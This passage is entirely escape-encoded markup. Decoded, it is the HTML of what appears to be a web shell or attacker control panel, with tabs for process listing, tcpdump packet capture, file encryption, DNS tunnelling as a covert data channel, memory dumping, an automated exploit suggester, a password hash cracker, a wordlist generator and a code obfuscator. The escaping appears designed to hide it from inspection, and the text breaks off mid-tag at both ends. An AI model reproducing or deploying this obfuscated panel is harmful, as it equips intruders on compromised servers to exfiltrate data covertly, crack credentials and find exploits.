122\x65\146\162\145\163\150\40\x28\x35\163\x29\74\57\x62\165\x74\164\157\156\x3e\x3c\x2f\144\x69\x76\76\74\x64\x69\x76\40\163\x74\171\154\145\x3d\42\x6f\x76\145\162\146\154\x6f\167\55\x78\x3a\141\165\164\157\73\x22\76\x3c\x74\141\x62\x6c\145\x20\x63\x6c\141\x73\x73\x3d\42\162\x65\x73\x75\x6c\164\163\55\x74\141\142\154\x65\42\x20\151\144\75\42\x70\162\157\143\x65\163\x73\145\163\55\164\x61\x62\154\x65\42\x3e\74\x74\x68\x65\141\x64\76\x3c\164\162\x3e\74\164\150\x3e\x50\x49\104\74\57\x74\x68\x3e\74\164\150\x3e\125\163\145\162\x3c\57\164\x68\x3e\74\x74\150\76\103\x50\125\40\x25\x3c\57\x74\x68\x3e\x3c\x74\150\76\115\x65\155\x6f\x72\171\40\x25\x3c\x2f\x74\150\76\74\164\x68\x3e\x43\157\x6d\155\x61\x6e\144\74\57\164\x68\76\x3c\x74\x68\76\101\x63\164\x69\157\x6e\163\x3c\x2f\164\x68\76\74\57\x74\162\76\x3c\57\164\150\x65\x61\x64\x3e\74\x74\x62\157\144\171\40\x69\x64\75\42\160\162\x6f\x63\145\x73\x73\x65\x73\55\x6c\151\x73\164\42\76\74\57\164\x62\x6f\144\x79\x3e\74\57\164\x61\x62\154\x65\76\x3c\57\x64\x69\166\x3e\x3c\x2f\x64\x69\x76\x3e\74\57\144\x69\166\76\x3c\x2f\144\151\166\x3e\xa\11\11\74\144\x69\166\x20\x69\x64\x3d\42\166\x69\145\167\x2d\x70\x61\143\x6b\x65\164\x2d\143\141\x70\x74\165\162\145\42\x20\143\154\x61\163\163\x3d\42\x76\151\145\167\x2d\143\x6f\156\x74\141\151\156\145\162\x22\x3e\74\x64\x69\166\40\143\154\141\x73\x73\x3d\x22\143\157\x6e\164\145\x6e\164\55\150\145\141\144\145\x72\x22\76\x4e\x65\x74\167\157\x72\153\40\120\141\143\x6b\145\164\x20\x43\x61\160\x74\x75\x72\145\74\57\144\151\x76\76\x3c\144\x69\166\x20\143\154\141\x73\163\x3d\x22\143\157\x6e\x74\145\156\x74\55\x61\x72\x65\x61\x22\x3e\x3c\144\151\166\40\143\x6c\x61\x73\x73\75\x22\x74\x6f\157\154\55\163\145\x63\164\x69\x6f\x6e\x22\76\x3c\x68\x33\x3e\103\141\160\x74\165\x72\145\40\116\x65\x74\x77\x6f\162\153\40\x54\162\141\x66\146\x69\143\x3c\57\150\63\76\74\160\x20\163\x74\171\154\145\75\42\143\157\x6c\x6f\x72\x3a\40\166\x61\162\50\55\55\164\145\x78\164\55\155\x65\144\x29\x3b\42\x3e\103\141\160\x74\x75\x72\145\40\x6e\x65\x74\x77\157\x72\153\40\x70\x61\x63\153\x65\164\163\x20\x75\x73\x69\156\x67\40\164\143\x70\144\x75\x6d\160\x20\x28\x4c\151\156\165\170\x20\x6f\x6e\x6c\x79\x29\56\x20\122\x65\161\165\x69\162\x65\x73\40\164\143\160\144\x75\x6d\x70\40\141\156\x64\40\141\x70\x70\x72\157\160\x72\x69\141\x74\x65\40\x70\145\x72\155\151\x73\x73\x69\157\x6e\163\x2e\74\57\x70\76\74\x64\151\166\40\x73\x74\x79\154\x65\75\42\x64\151\x73\x70\x6c\141\171\x3a\x67\162\151\144\x3b\40\x67\x72\x69\144\55\164\x65\x6d\160\154\141\164\x65\55\143\x6f\154\165\155\156\x73\72\40\x72\145\x70\145\141\x74\50\141\165\164\x6f\x2d\146\151\x74\x2c\x20\x6d\x69\x6e\x6d\x61\170\50\62\x30\x30\x70\x78\x2c\40\61\146\162\51\51\x3b\x20\147\141\x70\72\x31\162\x65\x6d\73\x20\x6d\141\162\x67\x69\x6e\x2d\142\x6f\x74\164\157\155\72\61\x72\x65\x6d\x3b\42\x3e\x3c\x69\156\x70\x75\164\40\164\x79\160\145\75\42\x74\145\170\x74\42\40\x69\144\x3d\x22\143\141\160\x74\x75\162\x65\55\151\156\x74\145\x72\x66\x61\x63\145\x22\x20\x70\x6c\x61\x63\x65\x68\x6f\154\x64\x65\162\x3d\x22\x49\156\x74\x65\162\x66\141\143\145\40\50\x65\56\x67\x2e\x2c\40\145\x74\x68\x30\x2c\40\x61\156\171\x29\x22\40\166\141\154\165\x65\x3d\x22\141\156\x79\x22\76\74\x69\x6e\x70\165\164\40\x74\x79\160\x65\x3d\x22\x6e\x75\155\x62\145\162\42\x20\151\x64\x3d\42\x63\x61\160\x74\x75\x72\145\55\143\x6f\x75\156\x74\42\40\160\x6c\141\x63\x65\x68\x6f\x6c\x64\x65\162\75\x22\120\x61\x63\x6b\145\164\40\143\x6f\165\156\164\42\x20\166\141\x6c\165\x65\x3d\x22\x35\x30\x22\40\155\x69\156\x3d\42\x31\x22\x20\x6d\141\x78\75\42\61\x30\x30\60\42\76\74\151\x6e\160\165\x74\x20\x74\171\x70\x65\75\42\x74\x65\170\x74\42\40\x69\144\75\x22\x63\x61\x70\164\165\162\145\x2d\x66\x69\x6c\x74\x65\162\42\40\160\154\x61\143\x65\x68\157\x6c\144\145\162\75\42\102\120\106\40\x66\x69\154\164\145\162\x20\50\x6f\x70\x74\151\157\x6e\141\154\x29\42\76\74\x2f\144\151\x76\x3e\74\142\165\164\164\x6f\156\x20\x69\144\75\x22\x73\x74\x61\x72\x74\x2d\143\141\160\164\x75\x72\x65\x2d\x62\164\156\x22\76\123\x74\141\162\164\x20\103\x61\160\x74\165\162\x65\74\x2f\x62\x75\x74\x74\157\x6e\76\x3c\x70\162\145\40\x69\144\75\42\x63\x61\x70\164\165\x72\145\55\x6f\165\164\160\x75\x74\42\x20\143\154\x61\163\163\x3d\x22\x6f\x75\164\x70\x75\164\55\142\157\170\42\40\163\164\171\154\x65\75\42\x6d\x61\162\147\151\x6e\55\x74\x6f\x70\x3a\x31\x72\x65\x6d\x3b\40\x6d\x69\x6e\55\x68\145\151\x67\x68\164\x3a\x32\x30\60\160\170\x3b\x22\76\x3c\x2f\x70\162\x65\x3e\74\x2f\x64\151\x76\76\x3c\57\x64\x69\x76\x3e\74\57\x64\x69\x76\76\xa\11\x9\x3c\x64\x69\x76\40\151\144\75\x22\x76\x69\145\x77\55\x63\162\x79\160\x74\x6f\55\x74\157\157\x6c\x73\x22\x20\143\154\141\163\x73\x3d\x22\166\151\145\167\x2d\x63\x6f\156\x74\x61\151\x6e\145\x72\42\x3e\74\x64\151\x76\40\x63\154\141\x73\163\x3d\42\x63\157\156\164\x65\x6e\x74\x2d\x68\x65\141\144\145\162\x22\x3e\103\162\x79\160\x74\157\147\162\x61\x70\150\x79\40\x54\x6f\x6f\154\x73\74\57\144\151\166\76\74\144\x69\166\40\x63\x6c\x61\x73\163\x3d\42\143\157\x6e\x74\x65\156\164\55\141\162\145\x61\42\x3e\74\144\x69\166\40\143\x6c\x61\x73\x73\75\x22\164\141\x62\x73\42\x3e\74\x73\x70\141\156\40\143\154\141\x73\x73\x3d\x22\x74\x61\x62\55\154\151\156\153\40\x61\143\x74\x69\166\x65\x22\x20\144\141\x74\x61\x2d\164\141\x62\x3d\42\x66\151\x6c\145\55\x63\x72\x79\x70\164\157\x22\x3e\106\x69\154\x65\x20\x45\156\x63\162\171\x70\164\x69\157\156\74\x2f\163\160\141\x6e\76\x3c\x73\160\141\156\x20\143\154\x61\163\163\75\x22\164\x61\142\x2d\154\151\156\x6b\x22\x20\144\141\x74\141\55\164\x61\x62\x3d\42\144\156\x73\55\164\x75\x6e\x6e\x65\x6c\42\x3e\104\116\123\x20\124\165\156\156\x65\x6c\151\156\147\74\57\163\x70\x61\156\x3e\x3c\x2f\x64\x69\166\76\x3c\144\x69\166\x20\151\x64\x3d\x22\164\x61\142\55\x66\x69\154\x65\x2d\x63\x72\x79\160\x74\x6f\x22\40\x63\154\x61\163\163\75\42\164\141\x62\x2d\x63\157\x6e\x74\x65\156\x74\40\141\x63\x74\x69\x76\145\42\76\x3c\144\x69\x76\x20\x63\154\x61\x73\x73\x3d\42\x74\157\157\154\55\x73\x65\x63\x74\x69\157\156\42\76\74\150\x33\76\x46\x69\154\145\x20\x45\156\x63\x72\x79\160\x74\x69\157\156\x2f\104\145\143\162\x79\160\x74\151\157\x6e\74\57\x68\63\76\74\160\x20\x73\x74\x79\154\145\75\42\143\157\x6c\x6f\162\x3a\40\x76\x61\162\x28\x2d\55\x74\x65\170\164\x2d\x6d\145\144\x29\73\x22\x3e\105\x6e\x63\x72\171\x70\164\40\157\162\x20\x64\145\x63\162\x79\160\164\40\x66\151\x6c\x65\163\40\165\x73\x69\156\x67\x20\101\105\123\55\x32\65\x36\55\103\x42\103\40\x65\x6e\143\x72\171\160\x74\151\x6f\156\x2e\x3c\57\x70\76\x3c\144\151\x76\40\x73\164\x79\x6c\x65\75\x22\144\151\163\160\x6c\x61\x79\72\x67\x72\151\144\73\x20\x67\162\x69\144\x2d\164\x65\155\160\x6c\x61\x74\145\x2d\143\157\x6c\x75\155\x6e\163\72\x20\x72\145\x70\x65\x61\164\x28\141\165\164\157\x2d\x66\151\x74\x2c\x20\x6d\x69\156\x6d\141\x78\50\62\x35\60\x70\x78\x2c\x20\61\146\162\51\x29\x3b\x20\x67\x61\160\72\61\x72\x65\x6d\x3b\40\x6d\x61\162\147\151\156\x2d\142\157\164\164\x6f\x6d\72\61\162\x65\x6d\x3b\42\x3e\74\151\x6e\160\x75\164\40\x74\171\160\145\x3d\x22\x74\145\x78\164\42\x20\151\144\x3d\42\143\x72\171\160\164\157\55\x66\x69\x6c\145\55\x70\x61\x74\150\x22\x20\x70\x6c\141\x63\145\x68\157\154\x64\145\x72\75\42\x46\165\154\x6c\x20\x70\x61\x74\x68\40\164\157\x20\x66\x69\154\x65\42\76\74\x69\x6e\x70\165\164\40\x74\171\x70\x65\75\x22\x70\141\x73\163\167\x6f\162\x64\42\x20\151\x64\x3d\42\143\x72\x79\x70\164\x6f\x2d\160\141\x73\x73\167\x6f\x72\144\x22\x20\160\x6c\141\x63\x65\150\157\x6c\144\x65\x72\x3d\42\x50\141\x73\x73\x77\x6f\162\144\x22\76\x3c\57\144\x69\x76\76\74\144\151\x76\x20\163\x74\171\154\145\x3d\x22\144\151\163\x70\x6c\x61\x79\x3a\x66\154\x65\170\73\x20\x67\141\x70\x3a\x31\x72\145\x6d\x3b\42\x3e\x3c\x62\x75\164\164\x6f\156\x20\x69\144\x3d\x22\x65\x6e\143\x72\x79\x70\164\x2d\x66\x69\154\x65\x2d\142\x74\156\x22\76\xf0\237\224\x92\x20\105\156\143\x72\x79\160\164\40\106\151\x6c\x65\74\57\x62\x75\164\164\157\156\x3e\x3c\142\x75\x74\164\x6f\156\x20\x69\x64\75\42\x64\145\143\162\x79\160\x74\55\146\x69\154\145\55\142\x74\x6e\x22\x3e\xf0\x9f\224\x93\40\x44\x65\143\162\171\x70\164\x20\x46\151\x6c\x65\74\x2f\x62\x75\164\164\x6f\x6e\x3e\74\57\x64\151\166\76\x3c\x64\x69\166\40\x69\144\75\42\x63\x72\x79\x70\x74\157\55\162\145\163\x75\x6c\x74\x73\42\40\163\x74\171\x6c\145\x3d\42\x6d\x61\x72\x67\151\156\x2d\x74\x6f\160\72\61\x72\x65\155\x3b\42\x3e\x3c\x2f\x64\151\166\x3e\74\57\144\151\x76\x3e\x3c\x2f\x64\151\x76\x3e\x3c\144\x69\166\40\x69\144\x3d\x22\x74\141\x62\55\144\x6e\x73\x2d\164\165\156\156\x65\154\42\40\x63\154\x61\163\163\x3d\42\164\x61\x62\x2d\x63\157\156\x74\x65\156\164\x22\x3e\x3c\144\151\x76\x20\x63\x6c\141\x73\163\x3d\42\x74\x6f\x6f\154\55\163\145\143\x74\151\157\x6e\42\x3e\74\x68\x33\x3e\x44\116\123\x20\124\x75\x6e\x6e\145\x6c\151\x6e\147\74\57\x68\x33\x3e\74\160\40\163\x74\x79\154\x65\x3d\x22\x63\x6f\x6c\x6f\x72\72\x20\x76\x61\x72\50\x2d\55\x74\145\x78\x74\55\155\x65\144\x29\x3b\42\x3e\x53\x65\156\x64\x20\141\156\144\x20\x72\145\x63\x65\151\x76\x65\40\x64\141\164\x61\x20\164\x68\x72\x6f\165\x67\150\x20\x44\x4e\123\40\161\165\x65\162\151\x65\163\x20\x28\x63\x6f\166\145\162\x74\x20\143\x68\x61\156\x6e\145\x6c\x29\56\74\57\x70\x3e\x3c\144\151\x76\40\163\x74\171\x6c\x65\75\x22\144\151\x73\160\154\141\x79\x3a\x67\x72\151\x64\x3b\x20\147\162\151\x64\55\164\145\x6d\x70\154\x61\x74\145\x2d\x63\x6f\x6c\165\155\156\x73\x3a\x20\162\x65\160\x65\141\164\50\x61\x75\164\x6f\x2d\x66\x69\x74\x2c\40\x6d\x69\156\155\x61\x78\50\62\60\60\x70\170\x2c\40\x31\146\162\51\51\x3b\40\x67\x61\160\x3a\x31\162\145\x6d\73\x20\155\141\x72\147\x69\156\55\x62\157\164\x74\x6f\x6d\72\x31\162\x65\155\x3b\x22\x3e\x3c\151\x6e\160\x75\x74\x20\164\171\x70\x65\x3d\42\x74\x65\x78\x74\x22\x20\x69\x64\x3d\42\144\156\x73\x2d\144\x6f\x6d\141\151\156\42\40\x70\x6c\x61\143\145\150\157\x6c\144\x65\162\x3d\42\104\x6f\x6d\141\151\x6e\x20\x28\x65\x2e\147\56\54\x20\145\x78\x61\155\160\154\145\x2e\143\x6f\x6d\x29\x22\x20\x76\141\154\165\145\75\42\145\170\x61\x6d\x70\x6c\145\x2e\x63\x6f\155\42\76\x3c\164\145\x78\x74\141\162\145\141\x20\151\144\75\x22\144\x6e\163\x2d\x64\x61\164\141\42\x20\160\154\141\x63\x65\x68\x6f\154\144\x65\162\x3d\x22\104\x61\x74\141\40\164\x6f\x20\163\145\156\x64\x22\40\163\164\x79\154\145\x3d\x22\x67\x72\151\144\55\x63\x6f\x6c\165\155\156\x3a\40\61\40\x2f\40\55\61\x3b\40\155\151\x6e\55\150\x65\x69\147\x68\164\x3a\61\60\x30\160\170\x3b\x22\76\74\57\164\145\170\164\x61\x72\145\141\x3e\x3c\x2f\144\151\x76\x3e\x3c\x64\151\x76\40\x73\164\171\x6c\x65\x3d\42\144\x69\x73\160\x6c\x61\171\x3a\146\x6c\x65\170\73\x20\x67\141\160\x3a\x31\x72\145\155\73\42\76\x3c\142\x75\164\164\157\x6e\40\151\x64\75\x22\x64\x6e\163\55\163\x65\156\144\55\x62\164\156\x22\x3e\xf0\x9f\223\244\40\x53\145\x6e\144\x20\166\151\x61\x20\104\116\123\74\x2f\x62\x75\x74\x74\157\x6e\76\x3c\x62\165\164\164\157\156\40\151\144\x3d\x22\x64\156\x73\55\x72\145\143\x65\151\166\x65\x2d\x62\x74\x6e\x22\76\360\x9f\x93\245\40\122\x65\x63\x65\151\166\145\x20\x76\x69\141\40\104\116\123\x3c\57\x62\165\164\164\157\x6e\76\74\57\144\x69\x76\76\x3c\x70\x72\x65\x20\x69\144\x3d\x22\x64\x6e\163\55\x72\145\x73\x75\154\164\x73\42\40\143\154\141\x73\x73\75\x22\157\165\x74\x70\165\x74\x2d\142\157\x78\42\x20\x73\164\x79\154\145\x3d\x22\x6d\141\x72\147\151\156\x2d\x74\x6f\x70\x3a\x31\x72\145\x6d\x3b\x22\x3e\74\x2f\x70\162\x65\x3e\x3c\x2f\144\151\166\76\74\x2f\144\151\x76\x3e\x3c\57\144\151\166\x3e\74\x2f\144\x69\x76\76\12\11\x9\74\144\151\x76\40\x69\x64\x3d\x22\166\151\145\167\x2d\141\x64\x76\x61\x6e\x63\x65\x64\x2d\164\157\x6f\154\x73\42\x20\x63\x6c\x61\163\163\x3d\x22\x76\151\x65\x77\55\x63\157\x6e\x74\141\x69\x6e\x65\x72\x22\76\74\x64\151\x76\x20\x63\154\x61\x73\163\75\x22\143\157\x6e\x74\145\x6e\x74\55\x68\x65\141\x64\145\x72\x22\76\101\x64\166\141\156\143\145\x64\x20\124\157\x6f\154\163\74\57\144\151\166\76\x3c\144\x69\166\x20\143\x6c\141\x73\x73\x3d\x22\x63\x6f\156\164\145\x6e\x74\x2d\x61\x72\x65\x61\x22\x3e\74\x64\151\166\x20\143\154\141\163\163\x3d\42\x74\141\x62\x73\x22\x3e\74\163\160\141\156\x20\x63\154\x61\163\x73\75\42\x74\141\142\55\x6c\x69\x6e\x6b\x20\141\x63\x74\151\x76\x65\42\40\x64\141\x74\x61\x2d\164\x61\142\x3d\x22\x6d\x65\155\x6f\162\x79\x2d\144\165\155\x70\42\x3e\x4d\x65\x6d\x6f\x72\x79\40\x41\156\x61\x6c\x79\163\151\x73\74\x2f\163\160\x61\156\76\74\163\160\141\156\x20\143\154\x61\x73\x73\75\42\164\141\x62\x2d\154\151\156\153\42\x20\144\x61\x74\x61\x2d\x74\141\142\75\x22\x65\x78\x70\154\x6f\151\164\x2d\163\x75\147\x67\x65\x73\x74\145\x72\x22\x3e\105\170\160\x6c\157\151\164\40\123\165\x67\147\145\163\164\x65\x72\74\x2f\x73\x70\x61\156\76\74\163\x70\141\156\x20\x63\154\141\x73\x73\75\x22\x74\141\142\x2d\x6c\151\x6e\153\x22\40\x64\x61\164\141\x2d\x74\141\x62\x3d\x22\160\x61\163\163\167\x6f\x72\144\x2d\x63\162\x61\x63\x6b\145\x72\42\76\120\x61\163\163\x77\x6f\162\x64\x20\103\162\x61\x63\x6b\145\162\x3c\x2f\163\160\141\156\x3e\x3c\163\160\141\156\x20\143\x6c\x61\x73\163\x3d\42\164\141\142\55\x6c\151\156\x6b\42\x20\144\x61\x74\x61\55\x74\141\142\x3d\42\x63\x6f\144\x65\55\x6f\x62\x66\x75\x73\143\141\x74\x6f\162\42\x3e\103\x6f\x64\x65\x20\117\x62\146\x75\163\143\141\164\x6f\162\x3c\x2f\163\x70\x61\x6e\x3e\74\x2f\x64\151\x76\76\74\x64\x69\166\40\151\x64\75\42\164\141\142\55\x6d\145\x6d\157\162\x79\x2d\144\x75\x6d\160\x22\40\143\x6c\141\163\x73\x3d\42\164\141\x62\x2d\143\157\x6e\x74\x65\156\164\40\141\143\x74\x69\166\x65\x22\76\74\x64\x69\x76\x20\143\x6c\x61\x73\x73\75\42\164\x6f\157\154\x2d\163\145\143\164\x69\x6f\x6e\x22\x3e\74\150\63\76\115\x65\155\x6f\x72\171\x20\x44\x75\155\160\40\x41\156\141\x6c\x79\172\x65\x72\x3c\x2f\150\63\x3e\x3c\x70\x20\x73\x74\x79\154\145\x3d\x22\x63\x6f\x6c\x6f\162\x3a\x20\166\x61\x72\x28\55\x2d\164\x65\170\x74\x2d\155\x65\x64\x29\x3b\x22\76\104\165\155\160\40\x61\156\144\x20\x61\x6e\x61\x6c\171\x7a\x65\40\160\x72\157\x63\145\163\163\x20\155\x65\x6d\x6f\x72\171\x20\50\114\151\x6e\x75\x78\40\x6f\156\x6c\171\54\40\x72\145\161\x75\x69\x72\145\x73\x20\x67\x64\x62\40\x6f\x72\40\57\x70\x72\x6f\x63\40\x61\143\143\145\163\x73\x29\56\74\x2f\160\x3e\x3c\x64\151\166\40\163\164\171\x6c\145\75\x22\x64\x69\x73\x70\x6c\141\171\72\x66\154\x65\x78\x3b\40\x67\141\160\72\61\x72\x65\x6d\73\40\155\x61\162\x67\151\156\55\x62\x6f\164\164\x6f\x6d\72\x31\x72\145\x6d\x3b\x22\x3e\x3c\151\156\160\165\164\40\x74\x79\x70\145\75\42\156\x75\x6d\142\x65\x72\42\x20\151\144\x3d\x22\x6d\x65\x6d\144\x75\x6d\160\55\160\x69\144\x22\40\x70\154\x61\x63\x65\x68\157\x6c\x64\x65\x72\75\42\120\162\157\143\x65\163\x73\40\111\x44\x20\x28\120\x49\x44\x29\42\40\x73\x74\x79\154\145\x3d\x22\x77\151\144\x74\150\x3a\x31\65\x30\160\x78\x3b\42\76\x3c\142\165\164\x74\157\x6e\x20\151\x64\75\42\x64\x75\x6d\x70\x2d\x6d\x65\x6d\157\x72\171\55\x62\x74\x6e\42\76\x44\x75\x6d\x70\40\x4d\x65\155\157\162\x79\74\x2f\x62\x75\x74\164\157\156\x3e\74\x2f\x64\151\166\x3e\x3c\144\151\166\40\163\164\x79\x6c\145\x3d\x22\144\151\163\x70\154\x61\x79\x3a\x66\x6c\x65\170\x3b\x20\147\x61\x70\72\x31\162\x65\155\x3b\40\x6d\141\x72\x67\151\156\x2d\x74\x6f\x70\x3a\61\x72\145\155\x3b\42\76\74\151\x6e\160\x75\x74\x20\x74\x79\x70\145\x3d\x22\164\x65\x78\x74\x22\x20\151\x64\75\42\155\x65\155\144\165\x6d\160\x2d\146\151\154\x65\42\40\160\x6c\141\x63\145\150\x6f\x6c\144\x65\x72\75\x22\104\x75\155\160\40\146\151\154\x65\x20\160\141\x74\x68\x22\x20\163\x74\171\x6c\x65\x3d\42\x66\x6c\x65\x78\x3a\x31\73\x22\76\74\x69\x6e\x70\x75\164\x20\x74\x79\x70\145\x3d\x22\164\145\x78\x74\42\x20\151\x64\x3d\x22\x6d\x65\x6d\x64\165\x6d\160\55\x70\x61\164\x74\145\162\x6e\42\x20\160\154\x61\x63\145\x68\157\x6c\x64\x65\162\75\x22\x53\145\141\162\143\150\x20\x70\141\164\x74\145\x72\x6e\x20\x28\157\x70\x74\x69\x6f\x6e\141\154\x29\42\x20\x73\164\171\x6c\x65\75\x22\x66\154\145\170\x3a\61\73\42\x3e\74\x62\165\164\x74\157\156\x20\x69\144\75\x22\141\156\141\154\171\172\145\55\155\x65\x6d\x6f\x72\171\55\142\x74\156\x22\x3e\x41\156\141\154\x79\x7a\x65\x20\x44\x75\155\x70\74\57\142\165\x74\164\157\x6e\76\74\57\x64\151\166\x3e\x3c\160\x72\x65\x20\151\144\x3d\42\155\x65\x6d\x64\165\x6d\x70\x2d\x6f\165\x74\160\x75\x74\x22\40\143\x6c\x61\x73\163\75\x22\x6f\x75\x74\x70\x75\x74\55\142\157\x78\42\x20\x73\164\x79\154\x65\75\42\x6d\141\x72\147\x69\x6e\55\164\x6f\x70\72\x31\x72\x65\x6d\x3b\x20\x6d\151\x6e\x2d\x68\145\x69\147\x68\x74\72\x32\x30\x30\x70\170\x3b\x22\76\x3c\x2f\160\x72\x65\76\x3c\x2f\144\151\x76\76\74\57\144\151\x76\x3e\74\x64\x69\x76\40\x69\144\x3d\x22\164\x61\142\x2d\145\x78\x70\x6c\157\x69\164\x2d\x73\x75\147\x67\x65\163\164\x65\x72\x22\x20\143\x6c\141\x73\x73\x3d\42\164\141\x62\x2d\143\x6f\x6e\x74\x65\156\164\x22\76\74\x64\151\166\x20\143\154\141\x73\163\x3d\x22\x74\x6f\x6f\x6c\55\x73\x65\143\164\x69\157\x6e\x22\76\x3c\x68\x33\x3e\101\165\x74\x6f\155\x61\x74\145\x64\40\105\170\160\154\157\151\x74\40\x53\x75\x67\x67\145\x73\x74\145\162\74\57\150\x33\76\x3c\x70\x20\163\x74\x79\x6c\x65\x3d\42\x63\x6f\154\x6f\x72\72\x20\x76\x61\162\50\x2d\x2d\164\145\x78\164\x2d\155\x65\x64\51\x3b\42\x3e\x41\x6e\141\154\171\x7a\145\40\x73\x79\x73\x74\x65\155\x20\141\156\x64\40\163\x75\x67\147\145\163\x74\x20\x70\157\x74\145\x6e\x74\x69\141\154\40\x65\170\x70\x6c\x6f\151\x74\163\40\142\141\x73\145\x64\40\x6f\156\40\117\123\54\x20\x6b\145\162\156\145\154\54\40\x61\x6e\x64\40\151\x6e\163\x74\x61\154\x6c\x65\144\40\163\x6f\146\x74\167\x61\x72\145\x2e\x3c\x2f\160\x3e\x3c\x62\x75\x74\x74\157\156\x20\x69\144\75\42\163\x75\147\x67\145\x73\164\x2d\x65\x78\x70\x6c\157\151\x74\163\55\142\x74\x6e\42\x3e\360\237\x94\215\40\123\x75\x67\x67\x65\x73\x74\x20\x45\x78\x70\x6c\157\151\164\x73\x3c\57\x62\165\x74\164\x6f\156\76\74\144\151\x76\40\151\144\75\42\x65\x78\x70\154\x6f\151\x74\x2d\x73\165\x67\x67\145\163\164\x69\157\x6e\163\42\40\x73\164\x79\154\x65\75\42\155\141\162\147\x69\x6e\55\x74\157\160\x3a\61\x72\145\x6d\x3b\42\x3e\x3c\x2f\x64\x69\166\76\74\x2f\144\151\166\x3e\74\57\144\x69\166\x3e\74\144\x69\x76\x20\x69\144\75\42\164\x61\142\55\x70\141\163\x73\167\x6f\162\x64\55\143\x72\141\143\x6b\145\x72\42\40\143\x6c\141\x73\163\75\x22\164\141\142\55\x63\x6f\x6e\x74\x65\x6e\164\42\x3e\74\x64\151\166\x20\x63\154\x61\x73\163\x3d\x22\164\x6f\157\154\55\x73\145\x63\164\151\157\x6e\42\x3e\x3c\150\x33\x3e\x50\141\163\163\167\x6f\162\x64\40\x48\141\163\x68\40\103\162\141\x63\153\x65\x72\74\x2f\x68\63\76\x3c\160\40\x73\164\x79\x6c\145\x3d\42\143\x6f\154\x6f\162\x3a\40\x76\141\x72\50\55\x2d\164\x65\x78\x74\55\155\x65\x64\51\x3b\x22\x3e\101\164\x74\145\x6d\160\164\x20\164\x6f\40\x63\x72\x61\143\x6b\x20\x70\141\163\163\167\x6f\162\144\40\x68\x61\x73\150\x65\x73\40\165\x73\151\156\x67\x20\x63\x6f\x6d\155\x6f\156\40\160\141\x73\x73\x77\x6f\162\144\x73\40\x61\156\x64\40\x77\x6f\x72\x64\x6c\151\163\x74\163\x2e\x3c\x2f\160\76\x3c\x64\151\x76\x20\163\164\x79\154\145\x3d\42\x64\151\x73\x70\x6c\x61\x79\72\x67\x72\x69\144\x3b\x20\x67\x72\151\144\x2d\164\x65\155\x70\154\141\164\x65\55\x63\x6f\x6c\165\155\156\163\72\x20\x72\145\160\145\x61\x74\x28\141\165\x74\x6f\55\x66\151\164\x2c\40\x6d\151\156\x6d\141\170\50\x32\60\60\x70\170\x2c\x20\x31\x66\x72\51\x29\73\40\x67\x61\x70\x3a\61\x72\x65\x6d\x3b\40\x6d\141\162\147\x69\156\55\142\x6f\x74\164\x6f\x6d\72\61\162\145\x6d\x3b\x22\76\x3c\151\x6e\x70\x75\164\40\164\x79\x70\145\75\x22\x74\x65\170\164\x22\40\151\x64\x3d\x22\x68\141\163\x68\55\151\x6e\160\x75\164\x22\x20\x70\154\x61\143\x65\150\157\x6c\144\x65\162\x3d\42\x48\141\x73\150\x20\x74\x6f\40\143\162\141\x63\153\42\40\163\x74\171\154\145\x3d\42\147\x72\x69\144\55\143\157\154\165\155\x6e\72\x20\x31\x20\57\40\x2d\61\x3b\x22\x3e\74\x73\145\x6c\x65\143\x74\x20\x69\144\x3d\x22\150\141\x73\x68\55\164\x79\160\145\42\40\163\164\x79\x6c\x65\75\42\x77\x69\144\x74\x68\x3a\x31\x35\x30\x70\x78\73\x22\x3e\74\x6f\160\x74\151\x6f\x6e\40\166\141\x6c\165\145\x3d\42\141\x75\164\157\42\76\101\165\x74\157\55\x64\x65\164\x65\143\x74\x3c\57\x6f\160\164\x69\157\156\x3e\x3c\157\160\164\151\x6f\x6e\x20\x76\x61\154\x75\145\75\42\x6d\x64\65\42\x3e\115\x44\x35\x3c\57\x6f\x70\x74\x69\157\156\x3e\74\x6f\x70\x74\x69\x6f\x6e\40\x76\x61\x6c\165\x65\x3d\x22\x73\150\141\x31\42\x3e\x53\110\101\x31\x3c\x2f\157\x70\x74\151\157\x6e\76\x3c\157\160\164\151\x6f\x6e\40\166\x61\154\165\x65\x3d\x22\x73\150\141\x32\x35\x36\42\x3e\123\x48\101\62\x35\66\x3c\57\x6f\x70\164\151\x6f\x6e\x3e\74\157\160\x74\151\157\156\x20\166\141\x6c\x75\x65\75\42\142\143\x72\x79\160\x74\x22\76\x62\143\x72\x79\x70\164\x3c\x2f\x6f\160\x74\151\x6f\156\76\x3c\x2f\x73\145\x6c\145\143\164\x3e\x3c\x2f\x64\151\166\76\x3c\x62\x75\x74\x74\x6f\x6e\x20\x69\144\x3d\42\143\162\141\x63\153\x2d\150\x61\163\150\x2d\x62\x74\x6e\x22\76\360\x9f\224\x93\x20\103\x72\141\143\153\x20\110\x61\x73\150\x3c\x2f\142\x75\x74\x74\157\x6e\x3e\x3c\x64\151\x76\40\x69\x64\x3d\42\143\x72\141\143\x6b\x2d\162\145\x73\165\x6c\164\x73\x22\x20\x73\x74\171\154\145\75\x22\155\x61\162\x67\151\x6e\55\164\157\x70\72\61\x72\145\155\x3b\42\76\x3c\57\144\x69\x76\76\x3c\x68\162\76\x3c\150\63\76\127\157\162\x64\154\x69\163\x74\40\107\x65\156\x65\x72\x61\x74\157\162\x3c\57\x68\63\x3e\x3c\x70\x20\163\164\x79\154\145\x3d\42\x63\157\154\x6f\x72\72\40\166\141\x72\50\55\55\x74\145\170\164\x2d\x6d\x65\x64\51\73\x22\76\107\145\156\145\x72\141\164\145\x20\x77\157\x72\144\154\151\163\x74\163\40\146\162\157\x6d\x20\142\x61\x73\145\x20\x77\157\162\144\x73\40\x77\x69\x74\150\40\x70\x61\x74\x74\x65\162\x6e\163\x2e\74\57\160\76\x3c\x74\x65\x78\164\x61\162\145\x61\x20\151\144\x3d\x22\167\x6f\x72\x64\154\x69\x73\x74\x2d\142\x61\x73\145\42\x20\160\x6c\x61\143\145\x68\157\154\x64\145\x72\75\42\x42\141\163\145\40\x77\x6f\x72\144\x73\x20\50\157\156\145\40\x70\145\x72\x20\154\151\156\145\x29\x22\40\x73\164\171\x6c\145\75\42\x77\x69\x64\164\150\x3a\61\x30\60\45\73\x20\155\151\x6e\x2d\150\x65\x69\147\x68\164\x3a\x31\x30\x30\160\x78\x3b\40\x6d\x61\x72\147\151\156\x2d\142\x6f\164\164\x6f\x6d\72\x31\162\x65\155\x3b\x22\x3e\x3c\57\164\x65\170\164\141\162\145\141\x3e\74\142\165\x74\164\157\x6e\40\x69